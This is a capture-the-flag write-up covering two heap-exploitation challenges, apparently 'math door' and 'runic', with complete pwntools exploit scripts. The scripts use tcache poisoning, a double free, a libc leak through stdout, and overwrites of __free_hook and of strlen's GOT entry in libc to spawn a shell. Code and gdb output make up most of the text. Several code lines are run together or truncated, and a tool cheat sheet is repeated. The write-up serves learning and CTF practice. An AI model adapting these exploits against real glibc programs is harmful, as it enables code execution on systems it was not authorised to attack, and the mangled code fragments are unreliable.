Our target is to trigger the double free, where the first free will make the chunk go to tcache, while the second free will make the chunk go to unsorted bin. Before freeing the chunks[1], let’s start by allocating some chunks to ensure the double free process will go smooth. The most crucial thing is before we free our fake chunk 0xa0, we need to ensure that the fake_chunks+0xa0 is a valid heap chunk as well. That’s why we will allocate some chunks first before starting to trigger the double free.
# Create two more chunks, because we will change the size of chunks[1] size to 0xa0, that means# chunks[1]+0xa0 is required to be a valid heap chunk as well (which in this case, chunks[10]# resides in chunks[1]+0xa0 based on observation in gdb). If we don't have chunks[10], it will trigger# `double free or corruption (!prev)` error.create()# Create chunks[9]create()# Create chunks[10]# Create 5 more chunks just to be safe, because we will mess up the heap bins, so better# to allocate more now.create()# Create chunks[11]create()# Create chunks[12]create()# Create chunks[13]create()# Create chunks[14]create()# Create chunks[15]
Let’s take a look on the gdb to ensure that chunks[1]+0xa0 is indeed a valid chunk
pwndbg> x/30gx 0x55555555c2b0
0x55555555c2b0: 0x0000000000000000 0x0000000000000021 // This is chunks[1]. We will change this to 0xa1
0x55555555c2c0: 0x000055555555c2b0 0x0000000000000000
0x55555555c2d0: 0x0000000000000000 0x0000000000000021
0x55555555c2e0: 0x0000000000000000 0x000055555555c010
0x55555555c2f0: 0x0000000000000000 0x0000000000000021
0x55555555c300: 0x000055555555c010 0x0000000000000000
0x55555555c310: 0x0000000000000000 0x0000000000000021
0x55555555c320: 0x0000000000000000 0x0000000000000000
0x55555555c330: 0x0000000000000000 0x0000000000000021
0x55555555c340: 0x0000000000000000 0x0000000000000000
0x55555555c350: 0x0000000000000000 0x0000000000000021 // This is chunks[10], which is chunks[1]+0xa0. This will make the process of freeing our fake chunks[1] smooth later.
0x55555555c360: 0x0000000000000000 0x0000000000000000
Now, we’re ready to trigger the double free.
delete(10)delete(1)# Doesn't matter, you can free either 1 or 3 because they're the same chunks.# Now, the tcache[0x20] freelist is chunks[1] -> chunks[10]inc_val(4,p64(0)+p64(0x80))# Update size to 0xa1 (0x21 + 0x80)delete(1)# Will go to unsorted bin# Now, chunks[1] reside in tcache[0x20] and unsorted bin :)# The tcache[0x20] freelist is now chunks[1] -> main_arena+96
Finally, we’re able to double free a chunk, so that we have a valid tcache freed chunk with pointer pointing to the libc area. It’s time to move to the next step, which is getting a libc leak via stdout
Getting a libc leak via _IO_2_1_stdout_
As we mentioned before, once we have poisoned the tcache to points to a libc address, to get a libc leak, we need to point it to _IO_2_1_stdout_, so that we can:
Overwrite _IO_2_1_stdout_->flags with 0x1800
Overwrite _IO_2_1_stdout_->_IO_write_ptr to be larger than _IO_2_1_stdout_->_IO_write_base.
If you want to understand why we can do that to get a libc leak, read my other blog post that explains about it.
First, let’s start by modifying the tcache freelist pointer with the math function, so that we will have a chunk pointing to the _IO_2_1_stdout_.
Notice that chunks[17] is now pointing to the _IO_2_1_stdout_. First, let’s start by overwriting the _IO_2_1_stdout_->flags to 0x1800. Let’s check the current flags value in gdb.
Now that the flag is 0x1800, we need to modify the _IO_write_ptr. We can simply do tcache poisoning again to allocate a chunk to the _IO_2_1_stdout_->_IO_write_ptr.
delete(11)# Free chunks[11]delete(12)# Free chunks[12]. Now, tcache[0x20]: 2 with freelist chunks[12] -> chunks[11]inc_val(8,p64(0x1))# Increase tcache_perthread_struct.counts[0] by 1, so that tcache[0x20]:3inc_val(12,p64(0xffffffffffffffff-(0xc0-1)))# Modify chunks[12] freelist pointer to point to chunks[1]# Now, freelist pointer of tcache[0x20]: chunk[12] -> chunks[1] -> _IO_2_1_stdout# (Remember that chunks[1] still contains libc address of _IO_2_1_stdout_ due to the previous poisoning)inc_val(1,p64(0x28))# Forge it to point to _IO_2_1_stdout_->_IO_write_ptr# Now, freelist pointer of tcache[0x20]: chunk[12] -> chunks[1] -> _IO_2_1_stdoutcreate()# Create chunks[18]create()# Create chunks[19]create()# Create chunks[20]# Now, chunks[20] points to _IO_2_1_stdout_ -> _IO_write_ptr
As you can see, chunks[20] is now pointing to _IO_2_1_stdout_->_IO_write_ptr. It’s time to increase the value to leak some libc addresses.
# Increase its value by 0x30. Now, when the binary called `puts`, it will leak some# Libc address, which is based on observation is _IO_stdfile_1_lockinc_val(20,p64(0x30))r.recv(5)leaked_libc=u64(r.recv(6).ljust(8,b'\x00'))libc.address=leaked_libc-libc.symbols['_IO_stdfile_1_lock']'Libc base: {hex(libc.address)}')
[*] Libc base: 0x7ffff7dd5000
Now that we’ve got a libc leak, we can continue to the next step
Gain Remote Code Execution
Because it used libc-2.31, we can simply overwrite __free_hook to system, and then call free("/bin/sh"), which is equivalent to system("/bin/sh"). We simply repeat the previous method that we did to allocate a chunk to _IO_2_1_stdout_->_IO_write_ptr.
delete(13)delete(14)# Based on observation in GDB, due to the previous poisoning dirty data, when we free# chunks[13], the pointer value will be initialized with _IO_2_1_stdout_+132 directly# So, freelist = chunks[14] -> chunks[13] -> _IO_2_1_stdout_+132, tcache[0x20]: 2inc_val(8,p64(0x1))# Increase tcache_perthread_struct.counts[0] by 1, so that tcache[0x20]:3inc_val(13,p64(0x1724))# Increase the freelist pointer by 0x1724, so that i points to __free_hookcreate()# Create chunks[21]create()# Create chunks[22]create()# Create chunks[23]# Now, chunks[23] points to __free_hook# Modify chunks[0] to "/bin/sh"inc_val(0,b'/bin/sh\x00')# Modify __free_hook to systeminc_val(23,p64(libc.symbols['system']))# free("/bin/sh") :)delete(0)r.interactive()
And finally, we got a shell :D. Let’s grab the flag!
one_gadget <libc_file>
ROPgadget --binary <binary_file>
readelf -s <libc_file> | grep <something>
readelf --sections <binary_file> | egrep "Name|.rela.plt|.dynsym|.dynstr"
rsactftool -n <modulus> -e <exponent> --private
pwninit <- patch ELF with the correct libc
libc = ELF(libc_path)
read_got =['read']
read_plt = exe.plt['read']
libc_system = libc.symbols['system']
bin_sh_string_addr = next('/bin/sh'))
bss = elf.bss()
sc = asm(
from pwn import *
kernel = ELF('./vmlinux')
unsorted_bin > fastbin
pub = RSA.importKey(open("pub.pem", "rb").read(), passphrase=None)
e = pub.e
n = pub.n
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrdefdemangle(val,is_heap_base=False):ifnotis_heap_base:mask=0xfff<<52whilemask:v=val&maskval^=(v>>12)mask>>=12returnvalreturnval<<12defmangle(heap_addr,val):return(heap_addr>>12)^valr=conn()defcreate():r.sendlineafter(b'Action: ',b'1')defdelete(idx):r.sendlineafter(b'Action: ',b'2')r.sendlineafter(b'index:',str(idx).encode())definc_val(idx,val):r.sendlineafter(b'Action: ',b'3')r.sendlineafter(b'index:',str(idx).encode())r.sendafter(b'hieroglyph:',val.ljust(0x18,b'\x00'))# Create three chunks (0, 1, 2)for_inrange(3):create()# Free the first two chunksdelete(0)# Delete chunks[0]delete(1)# Delete chunks[1]# Poison the tcache so that the freed linked list points# to the chunks[1] metadata.inc_val(1,p64(0x10))create()# Create chunks[3]. Because it uses tcache, so basically chunks[3] and chunks[1] are overlapping (pointing to the same heap chunk).create()# Create chunks[4]. Now, it points to chunks[1] and chunks[3] metadata.inc_val(4,p64(0)+p64(0x21))# Fix the chunks[3] metadata size to 0x21 because the metadata got nullified due to the creation before.# Now, we have a chunk (chunks[4]) which points to other chunks metadata (chunks[1] and chunks[3]).# We will use it later as we want to setup for other things first# Curr condition:# tcache[0x20] is emptycreate()# Create chunks[5]create()# Create chunks[6]delete(2)# tcache[0x20]: 1delete(5)# tcache[0x20]: 2inc_val(5,p64(0xffffffffffffffff-(0x2d0-1)))# Subtract the value of chunks[5] freelist pointer by 0x2d0# Now, the freelist pointer will point to the tcache_perthread_struct.countscreate()# Create chunks[7]create()# Create chunks[8]. Now, it points to tcache_perthread_struct.countsinc_val(8,p64(0)+p64(0)+p64(0x7))# Set tcache_perthread_struct.counts[(0xa1-0x20-1) // 16] to 0x7# Create two more chunks, because we will change the size of chunks[1] size to 0xa0, that means# chunks[1]+0xa0 is required to be a valid heap chunk as well (which in this case, chunks[10]# resides in chunks[1]+0xa0 based on observation in gdb). If we don't have chunks[10], it will trigger# `double free or corruption (!prev)` error.create()# Create chunks[9]create()# Create chunks[10]# pause()# Create 5 more chunks just to be safe, because we will mess up the heap bins, so better# to allocate more now.create()# Create chunks[11]create()# Create chunks[12]create()# Create chunks[13]create()# Create chunks[14]create()# Create chunks[15]# pause()delete(10)delete(1)# Doesn't matter, you can free either 1 or 3 because they're the same chunks.# Now, the tcache[0x20] freelist is chunks[1] -> chunks[10]inc_val(4,p64(0)+p64(0x80))# Update size to 0xa1 (0x21 + 0x80)delete(1)# Will go to unsorted bin# Now, chunks[1] reside in tcache[0x20] and unsorted bin :)# The tcache[0x20] freelist is now chunks[1] -> main_arena+96inc_val(1,p64(0xac0))# Forge to _IO_2_1_stdout_._flagscreate()# Create chunks[16]create()# Create chunks[17]inc_val(17,p64(0xffffffffffffffff-(0xfbad2887-1)+0x1800))# Subtract the _flags value to be 0x1800delete(11)# Free chunks[11]delete(12)# Free chunks[12]. Now, tcache[0x20]: 2inc_val(8,p64(0x1))# Increase tcache_perthread_struct.counts[0] by 1, so that tcache[0x20]:3inc_val(12,p64(0xffffffffffffffff-(0xc0-1)))# Modify chunks[12] freelist pointer to point to chunks[1]# Now, freelist pointer of tcache[0x20]: chunk[12] -> chunks[1] -> _IO_2_1_stdout# (Remember that chunks[1] still contains libc address of _IO_2_1_stdout_ due to the previous poisoning)inc_val(1,p64(0x28))# Forge it to point to _IO_2_1_stdout_->_IO_write_ptr# Now, freelist pointer of tcache[0x20]: chunk[12] -> chunks[1] -> _IO_2_1_stdoutcreate()# Create chunks[18]create()# Create chunks[19]create()# Create chunks[20]# Now, chunks[20] points to _IO_2_1_stdout_ -> _IO_write_ptr# Increase its value by 0x30. Now, when the binary called `puts`, it will leak some# Libc address, which is based on observation is _IO_stdfile_1_lockinc_val(20,p64(0x30))r.recv(5)leaked_libc=u64(r.recv(6).ljust(8,b'\x00'))libc.address=leaked_libc-libc.symbols['_IO_stdfile_1_lock']'Libc base: {hex(libc.address)}')delete(13)delete(14)# Based on observation in GDB, due to the previous poisoning dirty data, when we free# chunks[13], the pointer value will be initialized with _IO_2_1_stdout_+132 directly# So, freelist = chunks[14] -> chunks[13] -> _IO_2_1_stdout_+132, tcache[0x20]: 2inc_val(8,p64(0x1))# Increase tcache_perthread_struct.counts[0] by 1, so that tcache[0x20]:3inc_val(13,p64(0x1724))# Increase the freelist pointer by 0x1724, so that i points to __free_hookcreate()# Create chunks[21]create()# Create chunks[22]create()# Create chunks[23]# Now, chunks[23] points to __free_hook# Modify chunks[0] to "/bin/sh"inc_val(0,b'/bin/sh\x00')# Modify __free_hook to systeminc_val(23,p64(libc.symbols['system']))# free("/bin/sh") :)delete(0)r.interactive()
Flag: HTB{y0ur_m4th_1s_fr0m_4n0th3r_w0rld!}
Pandora is close to finally arriving at the Pharaoh’s tomb and finding the ancient relic, but she faces a tremendously complex challenge. She stumbles upon a alien-looking piece of technology that has never been mentioned in her archives, and it seems to be blocking the entrance to the Pharaoh’s tomb. The machine has some runes inscribed on its surface, but Pandora can’t work their meaning out. The only thing she knows is that they seem to appear, change and disappear when she tries to manipulate them. She really can’t figure out the inner workings of the device, but she can’t just give up. Can you help Pandora master the runes?
Initial Analysis
We were given a binary file called runic and Checking the given, it is a libc-2.35. Let’s checksec it first.
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
So, the binary enabled all protections. Let’s start disassemble it one by one.
int__cdecl__noreturnmain(intargc,constchar**argv,constchar**envp){intv3;// [rsp+Ch] [rbp-4h]
setup(argc,argv,envp);puts("This is the ultimate test!\n""Do you have what it takes to master the runes?\n""Are you worthy of laying your eyes on the Pharaoh's tomb?\n""Only your actions will tell...");while(1){while(1){puts("1. Create rune\n2. Delete rune\n3. Edit rune\n4. Show rune\nAction: ");v3=read_int();if(v3!=4)break;show();}if(v3>4){LABEL_13:puts("Invalid action!");}elseif(v3==3){edit();}else{if(v3>3)gotoLABEL_13;if(v3==1){create();}else{if(v3!=2)gotoLABEL_13;delete();}}}}
Okay, so from the main menu, it seems that there are 4 menu that we can use. Let’s check each function one by one. And also it called setup first before going to the while loop interactions. Let’s check all of it one by one
Ah okay, so basically, the hash function is just parsing our input byte-per-byte, add all the bytes value together, and do bitwise operator & 0x3f to ensure the maximum generated hash value is 0x3f.
So, reading through the create function, we can see that it is trying to implement a hashmap table, where:
It will calculate the hash(rune_name) to get the hashmap index.
Fetch the items[24*idx] address stored in the MainTable[idx].
Create a chunk with size equals to rune_length + 0x8.
Set items[24*idx] value to rune_name.
Set items[24*idx] + 0x8 value to chunk address.
Set items[24*idx] + 0x10 value to rune_length.
Set chunk first 8 bytes to rune_name.
Set chunk+8 to rune_contents.
So far, there isn’t any bug in this function. Also the max size that we can allocate is 0x60. Let’s move to the next function
This function is used to see the rune contents. It also prevent UAF because it checks whether the rune is still active or not. Let’s move to the next function.
src is the string of the new_rune_name. During moving the entry of old rune name items to the new rune name items, it uses the hash(src).
However, during filling the rune_contents, it doesn’t directly use hash(src) during fetching the read size. It uses variable called dest, which is a string copied from src via strcpy.
strcpy will only copy a string until its first null byte. Yet, it uses read(0, src, 0x8) during filling the src variable, which allowed us to send null byte in the middle of its rune_name. That means, during the binary asks for the rune_contents, the read size (which is MainTable[hash(dest)] + 16LL) can be wrong, because the value of dest and src is different if there is a null-byte in the middle of the rune name.
For example, let say the src value is \x01\x00\x02. The result of hash(src) is 3. But, the result of hash(dest) is 1, because strcpy(dest, src) will set the dest value to \x01\x00. This means, the size that is used during read(0, dest + 8, *(unsigned int *)(MainTable[v4] + 16LL)); will used the size of MainTable[1] instead of MainTable[3].
Now that we’ve found the bug, let’s start to think on how to leverage this bug to gain a shell.
We can use the bug to trigger a heap overflow bug, by setting the size larger than the actual chunk’s size. For example, we create a rune where the rune_name_a = '\x01\x00', so that hash(rune_name_a) value is 1, and set its size to 0x60. Then, we create another rune where the rune_name_b = '\x02\x00', so that the hash(rune_name_b) value is 2, and set its size 0x10. If we use the edit menu to edit the rune_name_b to rune_name_c = '\x01\x00\x02, then during fetching the new contents size, it will use the rune_a size because the hash(dest) of rune_name_c will be 1 instead of 3.
Let’s try to think first on how we will use the heap overflow bug. Supposed that we already have an overflow, what should we do to get a leak of heap base?
The answer is we need to have two adjacent chunks, where the first chunk is the one that we can overflow, and the second chunk is a freed chunk that contains a mangled pointer to the heap area. Let say that we have this chunks:
And we want to leak the chunk_b. What we can do is simply overflow the chunk_a until it reach the chunk_b b data, and then with the show menu, we can call puts(chunk_a), which due to the overflow, it will also print the chunk_b value even though chunk_b is a free chunk and originally can’t be seen with the show menu.
0x0000000000000000 0x0000000000000021
0x6161616161616161 0x6161616161616161 <- Overflow chunk_a (Active)
0x6161616161616161 0x6161616161616161
0x0000000000424242 0x0000000000000000 <- chunk_b (Inactive (has been freed))
If we call puts(chunk_a), the content of chunk_b will be printed as well
This is the basic logic that we will use during leveraging the overflow bug. Not only leaking adjacent chunk values, we can also modify adjacent chunk size metadata, or even poisoned its tcache freelist pointer (if the chunk is a tcache entry). With the overflow bug, it’s enough for us to gain a shell. My main idea to trigger the shell is:
demangle and mangle is needed because libc-2.35 have extra protection where they sort of encrypt the freelist pointer. But as long as we got the heap leak, it’s easy to get the real address.
Now that we have defined our helpers, let’s kickstart our initial setup first.
Initial Setup
'''# The only purpose for this chunk is we need the size to be used# during the edit bug. Set the key to `\x01`create(key(0x01),0x60,b'a'*0x60)# Let's call this `helper_chunk_a`# We will use this chunk a lot latercreate(key(0x32),0x18,b'b'*0x18)# Let's call this `main_chunk`# This chunk will be used as our main target to be poisonedcreate(key(0x33),0x18,b'c'*0x18)# Let's call this `poisoned_chunk`# This chunk will be used as a helper during poisoning our `poisoned_chunk`create(key(0x34),0x18,b'd'*0x18)# Let's call this `helper_chunk_b`# These allocations purposes are for heap chunks alignment later.create(key(0x35),0x8,b'e'*0x8)create(key(0x36),0x18,b'c'*0x8+p64(0)+p64(0x41))# Need this to align the chunks later after forgerycreate(key(0x37),0x18,b'd'*0x18)create(key(0x38),0x18,b'e'*0x18)# Just to be safe to prevent consolidation (heap chunk got merged during free)
After executing the above LOCs, below is the heap layout
pwndbg> x/80gx 0x561b6d1f3290
0x561b6d1f3290: 0x0000000000000000 0x0000000000000071 <- helper_chunk_a
0x561b6d1f32a0: 0x0000000000000001 0x6161616161616161
0x561b6d1f32b0: 0x6161616161616161 0x6161616161616161
0x561b6d1f32c0: 0x6161616161616161 0x6161616161616161
0x561b6d1f32d0: 0x6161616161616161 0x6161616161616161
0x561b6d1f32e0: 0x6161616161616161 0x6161616161616161
0x561b6d1f32f0: 0x6161616161616161 0x6161616161616161
0x561b6d1f3300: 0x6161616161616161 0x0000000000000031 <- main_chunk
0x561b6d1f3310: 0x0000000000000032 0x6262626262626262
0x561b6d1f3320: 0x6262626262626262 0x6262626262626262
0x561b6d1f3330: 0x0000000000000000 0x0000000000000031 <- poisoned_chunk
0x561b6d1f3340: 0x0000000000000033 0x6363636363636363
0x561b6d1f3350: 0x6363636363636363 0x6363636363636363
0x561b6d1f3360: 0x0000000000000000 0x0000000000000031 <- helper_chunk_b
0x561b6d1f3370: 0x0000000000000034 0x6464646464646464
0x561b6d1f3380: 0x6464646464646464 0x6464646464646464
0x561b6d1f3390: 0x0000000000000000 0x0000000000000021 <- For alignment purposes during freeing fake chunk
0x561b6d1f33a0: 0x0000000000000035 0x6565656565656565
0x561b6d1f33b0: 0x0000000000000000 0x0000000000000031 <- For alignment purposes during freeing fake chunk
0x561b6d1f33c0: 0x0000000000000036 0x6363636363636363
0x561b6d1f33d0: 0x0000000000000000 0x0000000000000041 <- If we forge poisoned_chunk size to 0xa0 later, this position is the address of poisoned_chunk+0xa0. So, the contents in this address should be a valid heap chunk metadata. I set it to 0x41.
0x561b6d1f33e0: 0x0000000000000000 0x0000000000000031 <- For alignment purposes during freeing
0x561b6d1f33f0: 0x0000000000000037 0x6464646464646464
0x561b6d1f3400: 0x6464646464646464 0x6464646464646464
0x561b6d1f3410: 0x0000000000000000 0x0000000000000031 <- Just to be safe to prevent consolidation
0x561b6d1f3420: 0x0000000000000038 0x6565656565656565
0x561b6d1f3430: 0x6565656565656565 0x6565656565656565
Now, let’s free the helper_chunk_b and poisoned_chunk.
# Let's start by freeing our helper_chunk_b continue with poisoned_chunkdelete(key(0x34))delete(key(0x33))# Now, poisoned_chunk contain a mangled heap pointer to the helper_chunk_b address
As you can see, poisoned_chunk now contains a mangled heap pointer to the helper_chunk_b address. Now, with the edit bug, let’s trigger an overflow in the main_chunk, so that we can write its contents until it reach the poisoned_chunk value. Don’t forget to set the new_key so that the copied hash value will be equals to 0x1, so that the size that is being used is 0x60 (which is the size of our first hashmap entry).
# Leak heap address by overflowing the `main_chunk` via edit feature.# Overflow it until just before the mangled heap pointer location.payload=b'b'*0x28# Set new key to `\x01\x00\x01`# Due to the edit bug, when fetching the size for the rune contents, it will# used size of entry with hash `\x01`, which is helper_chunk_a size (0x60)edit(key(0x32),key(0x10001),payload)
As you can see, we have successfully overflow the main_chunk. If we call show to the main_chunk, it will also print the contents of poisoned_chunk, which is mangled heap pointer to helper_chunk_b address.
# Show the content, and last 6 bytes will be the mangled heap pointer of helper_chunk_b addressout=show(key(0x10001))leaked_heap_addr=demangle(u64(out[-6:].ljust(8,b'\x00')))heap_base=leaked_heap_addr>>12<<'heap_base: {hex(heap_base)}')
[*] heap_base: 0x561b6d1f3000
Now that we’ve got the heap base address, let’s move to the next step
Leak libc address
In order to get a libc leak, we need to free a chunk to the unsorted bin. However, notice that the max size that we can allocate is only 0x60, which mean even though we fulfill the tcache bins, the chunk will be placed to fastbin instead of unsorted_bin when the tcache is full.
So, I decided to use the same approach as what I did in the math door challenge, which is trying to fulfill the tcache[0xa0] bins to 7 via tcache poisoning, where I:
Allocate a chunk to the tcache_perthread_struct.counts (which resides in the heap base)
Set the counts[(0xa0-0x20) // 16] to 7.
Forge a chunk size metadata to 0xa0.
Free it, and now the chunk contains a libc address.
Let’s do that.
# Poison poisoned_chunk tcache pointer to point# to tcache_perthread_struct (heap_base+0x10)tcache_struct_addr=heap_base+0x10fake_metadata=b'b'*0x18+p64(0)+p64(0x21)+p64(mangle(heap_base,tcache_struct_addr))edit(key(0x10001),key(0x20001),fake_metadata)# Now, poisoned_chunk tcache pointer will point to# tcache_perthread_struct instead of helper_chunk_b.
As you can see, the freelist pointer value stored in poisoned_chunk is changed, so that after demangling it, it will points to tcache_perthread_struct instead of to helper_chunk_b address. Now, if we allocate two chunks with size 0x30, it will go to the tcache_perthread_struct.
create(key(0x33),0x18,b'a'*0x18)# Call malloc, next allocation will be placed in the tcache_perthread_struct# This malloc will go to tcached_perthread_structcreate(key(0x34),0x18,p64(0)+p64(0x7))# Now, we have successfully allocate a chunk to the tcache_perthread_struct# + we also overwrite the tcache[0xa0] size to 7, so that it is considered as full
pwndbg> tele 0x561b6c45e800
00:0000│ 0x561b6c45e800 (MainTable+416) —▸ 0x561b6c45e540 (items+1248) ◂— 0x34 /* '4' */
pwndbg> x/10gx 0x561b6c45e540
0x561b6c45e540 <items+1248>: 0x0000000000000034 0x0000561b6d1f3010 <- HashMap with key 0x34 is mapped to tcache_perthread_struct address
0x561b6c45e550 <items+1264>: 0x0000000000000018 0x0000000000000035
pwndbg> bins
0x20 [ 52]: 0x0
0x30 [ 0]: 0x561b7d1f3
0xa0 [ 7]: 0x0 <- We have successfully fulfill the tcache[0xa0] bins
Now that we have succesfully forge the tcache bins, let’s try to overwrite the size metadata of our poisoned_chunk to 0xa0.
# Now, let forge the size of our poisoned_chunk to 0xa1 with the edit bugfake_metadata=b'b'*0x18+p64(0)+p64(0xa1)edit(key(0x20001),key(0x30001),fake_metadata)
As you can see, the poisoned_chunk now contains libc address. To leak it, let’s repeat the same method that we use to get the heap address leak like before. And also don’t forget to fix the metadata back after we get the leak, just to ensure there isn’t anything weird happen later.
# Leak libc address by overflowing our main_chunk via the edit bug again# (just like before when we try to leak heap baddress)payload=b'b'*0x28edit(key(0x30001),key(0x10001),payload)out=show(key(0x10001))leaked_libc_addr=u64(out[-6:].ljust(8,b'\x00'))'libc base: {hex(libc.address)}')# Fix its metadata (revert it just like before we overflow)payload=b'b'*0x18+p64(0)+p64(0xa1)edit(key(0x10001),key(0x20001),payload)
[*] libc base: 0x7fac6f800000
Now that we’ve got a libc leak, it’s time to move to the last step.
Gain Remote Code Execution
The binary is using libc-2.35, which means we can’t use __free_hook anymore. The easiest trick to get a system in this glibc is we can try to overwrite the GOT entry of strlen in libc, so that when it called puts("/bin/sh"), it will trigger system("/bin/sh"), because puts will call strlen to the input string. I found this trick from this blog.
To do that, we will once again do the tcache poisoning, to allocate a chunk to the strlen GOT in libc. First, let’s take a look on how the GOT looks like.
The target is to overwrite __strlen_avx2 to system. Notes that __strlen_avx2 address is ended with 0x8, which mean we can’t set it directly to strlen GOT address because it will trigger alignment error. We also couldn’ set it to GOT - 0x8, because during allocation via tcache, the entry+8 will be cleared to 0 (due to the logic inside tcache where it will clear the tcache key value), which means strlen will be set to 0 first during calling malloc. Check this LOCs of create function for the proof:
Notice that before we were able to fill it, the binary call puts("Rune contents:"), and because puts has dependency to strlen, the binary will crash because the strlen is still 0 due to the malloc.
So, the best place is to set the chunk address to GOT-0x18, so that during calling malloc, the strlen won’t be cleared.
# Remember that this allocation will still be placed in the exact same address as # our poisoned_chunk (which is adjacent to the main_chunk). The reason is because # there isn't any tcache[0x50] entries yet, so this allocation will take a place in # the unsorted bin chunk address, which is still adjacent to our main_chunk.create(key(0x33),0x38,b'a'*0x38)create(key(0x22),0x38,b'a'*0x38)delete(key(0x22))delete(key(0x33))# Now, as usual, poisoned_chunk contains address to heap chunk# Overwrite it to strlen GOT - 0x18# We can't set it directly to strlen GOT because:# - It will trigger alignment error (because the last 8 bit of strlen GOT is 0x8)## We alo can't set it to GOT - 0x8 because:# - During allocation via tcache, the entry+8 will be cleared to 0, which mean strlen# will be set to 0.# - Before we were able to fill it, the binary call puts("Rune contents:"), and because puts# has dependency to strlen, the binary will crash.# # So, the best place is to set the chunk address to GOT - 0x18 payload=b'b'*0x18+p64(0)+p64(0x51)payload+=p64(mangle(heap_base,libc.address+0x1f2098-0x18))edit(key(0x20001),key(0x30001),payload)
As you can see, the tcache[0x50] is now pointing to the strlen GOT-0x18. Now, we just need to allocate two more chunks, and the second chunk will be placed in the strlen GOT-0x18.
# Allocate /bin/sh\x00. We will call puts to this chunk latercreate(b'a'*8,0x38,b'/bin/sh\x00')# Now, next allocation will be placed in strlen GOT-0x18# Overwrite strlen GOT in libc with system# __wmemcmp_avx2_movbe + _dl_find_dso_for_object@got.plt + __strncpy_avx2 + systempayload=p64(libc.address+0x2c0f0)+p64(libc.address+0x17a780)+p64(libc.symbols['system'])create(key(0x21),0x38,payload)
We have successfully overwritten the strlen GOT to system. Now, we just need to call puts() to the hashmap entry with key 0x38 to get a shell :).
# Now, calling puts will call system as well, which means# puts('/bin/sh') will be hijacked to system('/bin/sh')r.sendline(b'4')r.readrepeat(1)r.sendline(b'a'*0x8)# Call puts# We got shellr.interactive()
one_gadget <libc_file>
ROPgadget --binary <binary_file>
readelf -s <libc_file> | grep <something>
readelf --sections <binary_file> | egrep "Name|.rela.plt|.dynsym|.dynstr"
rsactftool -n <modulus> -e <exponent> --private
pwninit <- patch ELF with the correct libc
libc = ELF(libc_path)
read_got =['read']
read_plt = exe.plt['read']
libc_system = libc.symbols['system']
bin_sh_string_addr = next('/bin/sh'))
bss = elf.bss()
sc = asm(
from pwn import *
kernel = ELF('./vmlinux')
unsorted_bin > fastbin
pub = RSA.importKey(open("pub.pem", "rb").read(), passphrase=None)
e = pub.e
n = pub.n
'''defconn():ifargs.LOCAL:r=process([exe.path])ifargs.PLT_DEBUG:# gdb.attach(r, gdbscript=gdbscript)pause()else:r=remote(remote_url,remote_port)returnrdefdemangle(val,is_heap_base=False):ifnotis_heap_base:mask=0xfff<<52whilemask:v=val&maskval^=(v>>12)mask>>=12returnvalreturnval<<12defmangle(heap_addr,val):return(heap_addr>>12)^valr=conn()defcreate(name,length,contents):r.sendlineafter(b': \n',b'1')r.sendafter(b': \n',name)r.sendlineafter(b': \n',str(length).encode())iflength>0:r.sendafter(b': \n',contents)defdelete(name):r.sendlineafter(b': \n',b'2')r.sendafter(b': \n',name)defedit(name,new_name,contents):r.sendlineafter(b': \n',b'3')r.sendafter(b': \n',name)r.sendafter(b': \n',new_name)r.sendafter(b': \n',contents)defshow(name):r.sendlineafter(b': \n',b'4')r.sendafter(b': \n',name)r.recvuntil(b'contents:\n')r.recvline()out=r.recvuntil(b'\n1')[:-2]returnoutdefkey(k):returnp64(k)'''
Notice that in the edit feature, you can use the size from other item due to bug on
calculating the hash with strcpy. So, during filling the contents of a rune in the
edit feature, there is this LOCs (simplified version):
read(0, new_rune_name, 8uLL);
new_rune_hash_1 = hash(new_rune_name); // Calculate hash of new rune name
strcpy(MainTable[new_rune_hash_1].item, new_rune_name);
old_rune_chunk_ptr = &MainTable[hash(old_rune_name)].item->rune_chunk;
new_rune_hash_1_1 = hash((__int64)new_rune_name);
memcpy(&MainTable[new_rune_hash_1_1].item->rune_chunk, old_rune_chunk_ptr, 0xCuLL);// Copy heap pointer address from old rune to new rune
strcpy(edited_rune_chunk, new_rune_name);
new_rune_hash_2 = hash((__int64)edited_rune_chunk);
read(0, edited_rune_chunk + 8, LODWORD(MainTable[new_hash].item->rune_size));
If our new_rune_name has null byte, for example b'\x01\x00\x01', strcpy will stop copy
after it find a null-byte. So, the result of new_rune_hash_1_1 and new_rune_hash_2 will be different.
This means that the rune_size used during changing the content will be wrong (instead of taking
the rune size with new_rune_hash_1_1, it will take the rune size of new_rune_hash_2, which can be
larger or smaller).
We can exploit this to overflow our heap, and leverage it to get code execution.
Initial Setup
'''# The only purpose for this chunk is we need the size to be used# during the edit bug. Set the key to `\x01`create(key(0x01),0x60,b'a'*0x60)# Let's call this `helper_chunk_a`# We will use this chunk a lot latercreate(key(0x32),0x18,b'b'*0x18)# Let's call this `main_chunk`# This chunk will be used as our main target to be poisonedcreate(key(0x33),0x18,b'c'*0x18)# Let's call this `poisoned_chunk`# This chunk will be used as a helper during poisoning our `poisoned_chunk`create(key(0x34),0x18,b'd'*0x18)# Let's call this `helper_chunk_b`# These allocations purposes are for heap chunks alignment later.create(key(0x35),0x8,b'e'*0x8)create(key(0x36),0x18,b'c'*0x8+p64(0)+p64(0x41))# Need this to align the chunks later after forgerycreate(key(0x37),0x18,b'd'*0x18)create(key(0x38),0x18,b'e'*0x18)# Just to be safe to prevent consolidation (heap chunk got merged during free)'''
Leak heap address
'''# Let's start by freeing our helper_chunk_b continue with poisoned_chunkdelete(key(0x34))delete(key(0x33))# Now, poisoned_chunk contain a mangled heap pointer to the helper_chunk_b address# Leak heap address by overflowing the `main_chunk` via edit feature.# Overflow it until just before the mangled heap pointer location.payload=b'b'*0x28# Set new key to `\x01\x00\x01`# Due to the edit bug, when fetching the size for the rune contents, it will# used size of entry with hash `\x01`, which is helper_chunk_a size (0x60)edit(key(0x32),key(0x10001),payload)# Show the content, and last 6 bytes will be the mangled heap pointer of helper_chunk_b addressout=show(key(0x10001))leaked_heap_addr=demangle(u64(out[-6:].ljust(8,b'\x00')))heap_base=leaked_heap_addr>>12<<'heap_base: {hex(heap_base)}')'''
Leak libc base.
We will leak libc base by trying to free a chunk to the unsorted bin
